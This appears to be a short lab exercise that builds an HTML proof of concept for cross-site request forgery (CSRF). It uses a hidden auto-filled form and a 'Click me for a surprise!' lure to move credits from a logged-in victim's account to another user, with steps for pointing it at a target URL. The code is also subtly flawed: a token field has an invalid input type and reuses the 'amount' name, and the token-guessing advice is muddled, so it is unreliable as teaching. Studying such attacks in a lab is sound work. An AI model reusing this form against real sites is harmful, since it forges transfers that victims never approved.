Creating a CSRF PoC:
CSRF is a type of attack where an attacker tricks a victim into performing an unwanted action on a website where they're authenticated, usually without the victim's knowledge or consent.
In this exercise, we'll demonstrate a simple CSRF attack by creating a form that can transfer credits from a logged-in user's account to another user without their knowledge. To find the exploit, try entering a CSRF token of the same length and adding it to the HTML PoC.
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>CSRF PoC</title>
</head>
<body>
<h2>CSRF Attack Example</h2>
<p>This page is crafted by an attacker to demonstrate a CSRF vulnerability. In a real-world scenario, a victim would be lured to this page while logged into the target website.</p>
<form action="TARGET_URL" method="post">
<input type="hidden" name="receiver" value="user1">
<input type="hidden" name="amount" value="100">
<input type="csrf_token" name="amount" value="........">
<input type="submit" value="Click me for a surprise!">
</form>
</body>
</html>
- Create an HTML page with the necessary form.
- Replace `TARGET_URL` with the URL where the original PHP page is hosted.
- When a logged-in user visits this crafted page and clicks on the provided button, credits will be transferred without their direct consent.